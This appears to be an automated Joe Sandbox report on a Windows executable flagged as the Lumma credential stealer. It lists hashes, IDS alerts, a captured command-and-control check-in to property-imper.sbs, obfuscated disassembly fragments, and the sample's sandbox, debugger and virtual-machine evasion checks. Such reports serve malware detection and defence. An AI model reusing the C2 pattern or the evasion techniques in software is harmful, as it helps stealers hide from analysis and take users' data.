Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561923
MD5:542cd6ef81cdd42518ba3baf58eb90e6
SHA1:b8ddd7bd3eae36806335a2c215863853c6c424f4
SHA256:23f4575b36961a3121fbec04b3e803e020e9dea411cce529a02e6eb658cc0f60
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 542CD6EF81CDD42518BA3BAF58EB90E6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T20:01:19.775771+010020283713Unknown Traffic192.168.2.849704104.21.33.116443TCP
2024-11-24T20:01:21.942911+010020283713Unknown Traffic192.168.2.849705104.21.33.116443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T20:01:20.801399+010020546531A Network Trojan was detected192.168.2.849704104.21.33.116443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T20:01:20.801399+010020498361A Network Trojan was detected192.168.2.849704104.21.33.116443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_002FCF05
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_002FC02B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00310870
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0032B860
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0032C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh0_2_0032C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h0_2_0032C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0032C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_0032B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_0032B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_002F98F0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0032F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_0032F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_002FE0D8
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]0_2_002FE970
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx0_2_002FEA38
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_002FE35B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00318CB0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_002FBC9D
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_002F5C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_002F5C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_0032BCE0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_002FAD00
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_00315E90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]0_2_00330F60
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]0_2_002F77D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax0_2_002F77D0

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 104.21.33.116:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 104.21.33.116:443
Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.33.116:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.33.116:443
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.1495487272.0000000000F12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495632957.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495559428.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496731344.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000002.1496527747.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiC
Source: file.exe, 00000000.00000003.1495632957.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiM
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.8:49704 version: TLS 1.2

System Summary

barindex
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003290300_2_00329030
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F89A00_2_002F89A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FCF050_2_002FCF05
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003108700_2_00310870
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F40400_2_002F4040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F68400_2_002F6840
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032C0400_2_0032C040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032B8E00_2_0032B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F98F00_2_002F98F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032F8D00_2_0032F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FE0D80_2_002FE0D8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FE9700_2_002FE970
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F61A00_2_002F61A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C59820_2_004C5982
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003241D00_2_003241D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C09B20_2_004C09B2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F92100_2_002F9210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FB2100_2_002FB210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F4AC00_2_002F4AC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB300_2_0030DB30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030FB600_2_0030FB60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036D36F0_2_0036D36F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F2B800_2_002F2B80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C241C0_2_004C241C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00318CB00_2_00318CB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00330C800_2_00330C80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B54F30_2_004B54F3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F5C900_2_002F5C90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003224E00_2_003224E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F6CC00_2_002F6CC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F94D00_2_002F94D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003095300_2_00309530
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C75580_2_004C7558
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FAD000_2_002FAD00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00313D700_2_00313D70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0048BD2A0_2_0048BD2A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F35800_2_002F3580
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003315800_2_00331580
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BF58C0_2_003BF58C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00317E200_2_00317E20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B165E0_2_004B165E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003106500_2_00310650
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B9EC60_2_004B9EC6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00315E900_2_00315E90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BEF5B0_2_004BEF5B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003187700_2_00318770
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E876E0_2_003E876E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00330F600_2_00330F60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003287B00_2_003287B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003117900_2_00311790
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032C7800_2_0032C780
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041278D0_2_0041278D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B07920_2_004B0792
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F27D00_2_002F27D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F77D00_2_002F77D0
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: Section: ZLIB complexity 0.999327612704918
Source: file.exeStatic PE information: Section: euxtkkub ZLIB complexity 0.9940000281193762
Source: classification engineClassification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003227B0 CoCreateInstance,0_2_003227B0
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: file.exeStatic file information: File size 1878528 > 1048576
Source: file.exeStatic PE information: Raw size of euxtkkub is bigger than: 0x100000 < 0x1a0c00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;euxtkkub:EW;ttmnjqdd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;euxtkkub:EW;ttmnjqdd:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x1d8c83 should be: 0x1d6a49
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: euxtkkub
Source: file.exeStatic PE information: section name: ttmnjqdd
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00595859 push esi; mov dword ptr [esp], 4963FB10h0_2_00595878
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00595859 push 32CBB7C8h; mov dword ptr [esp], ebx0_2_005958EB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00595859 push edi; mov dword ptr [esp], eax0_2_00595910
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD85E push ecx; mov dword ptr [esp], esi0_2_004FD8CD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00308028 push esp; ret 0_2_0030802B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B0868 push ebx; mov dword ptr [esp], 1AD68EE0h0_2_005B0872
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B0868 push esi; mov dword ptr [esp], 502CB876h0_2_005B09BE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00596839 push 58DF42F3h; mov dword ptr [esp], esi0_2_0059687D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00305057 push eax; iretd 0_2_00305058
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AC030 push 5BC44554h; mov dword ptr [esp], edx0_2_005AC0A5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E803B push edx; mov dword ptr [esp], 2C8BAC70h0_2_004E8083
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005590D4 push esi; mov dword ptr [esp], edi0_2_00559112
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005808D6 push ebp; mov dword ptr [esp], eax0_2_00580903
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DF0E7 push 56689AA5h; mov dword ptr [esp], edi0_2_004DF6ED
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005878E8 push ebp; mov dword ptr [esp], 6DCC9028h0_2_0058791E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005878E8 push ebx; mov dword ptr [esp], esi0_2_0058793A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005878E8 push 3AD7AF7Dh; mov dword ptr [esp], eax0_2_00587961
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005780EF push edi; mov dword ptr [esp], esi0_2_005784B5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058D095 push 1A52A2A6h; mov dword ptr [esp], esp0_2_0058D0B8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058D095 push edi; mov dword ptr [esp], 0B2F15D6h0_2_0058D0C3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058D095 push 76C03E25h; mov dword ptr [esp], edi0_2_0058D182
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058C8BC push 2039066Dh; mov dword ptr [esp], eax0_2_0058C8CA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE8A7 push eax; mov dword ptr [esp], 4FFB6DA6h0_2_004EE8F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00541953 push 04FEEF4Bh; mov dword ptr [esp], ebx0_2_00541992
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052917F push 64EE862Bh; mov dword ptr [esp], ebx0_2_00529D89
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052917F push 66DA49E7h; mov dword ptr [esp], esp0_2_00529D92
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030811F push esp; iretd 0_2_00308135
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00308100 push esp; iretd 0_2_00308102
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F811B push 5AD60994h; mov dword ptr [esp], ecx0_2_004F812C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F811B push 7BFE382Eh; mov dword ptr [esp], esp0_2_004F8134
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005881C6 push 40335C28h; mov dword ptr [esp], eax0_2_005881F0
Source: file.exeStatic PE information: section name: entropy: 7.982670548763517
Source: file.exeStatic PE information: section name: euxtkkub entropy: 7.953806103846816

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34D3AF second address: 34CC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A7h 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2786h], ecx 0x00000011 push dword ptr [ebp+122D13ADh] 0x00000017 cmc 0x00000018 call dword ptr [ebp+122D2729h] 0x0000001e pushad 0x0000001f cmc 0x00000020 xor eax, eax 0x00000022 jmp 00007F59556149A4h 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c add edx, dword ptr [ebp+122D37F9h] 0x00000032 mov si, ax 0x00000035 popad 0x00000036 mov dword ptr [ebp+122D3AF9h], eax 0x0000003c or dword ptr [ebp+122D21CCh], edi 0x00000042 mov esi, 0000003Ch 0x00000047 js 00007F595561499Ch 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 pushad 0x00000052 mov bx, 3189h 0x00000056 mov dword ptr [ebp+122D21CCh], esi 0x0000005c popad 0x0000005d lodsw 0x0000005f cld 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 pushad 0x00000065 pushad 0x00000066 add eax, 41EABC8Eh 0x0000006c mov dword ptr [ebp+122D21CCh], ebx 0x00000072 popad 0x00000073 call 00007F59556149A8h 0x00000078 mov esi, eax 0x0000007a pop edi 0x0000007b popad 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 cld 0x00000081 nop 0x00000082 push edi 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 pop eax 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB457 second address: 4BB468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F5954CE94A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB468 second address: 4BB46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB46C second address: 4BB472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB472 second address: 4BB47E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5955614996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB47E second address: 4BB482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB482 second address: 4BB4B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F595561499Ch 0x00000012 jc 00007F5955614996h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB575 second address: 4CB579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB579 second address: 4CB57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB57F second address: 4CB58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB58B second address: 4CB58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB58F second address: 4CB5AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB88B second address: 4CB895 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB895 second address: 4CB89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBB26 second address: 4CBB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBB2B second address: 4CBB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBB31 second address: 4CBB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBB37 second address: 4CBB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
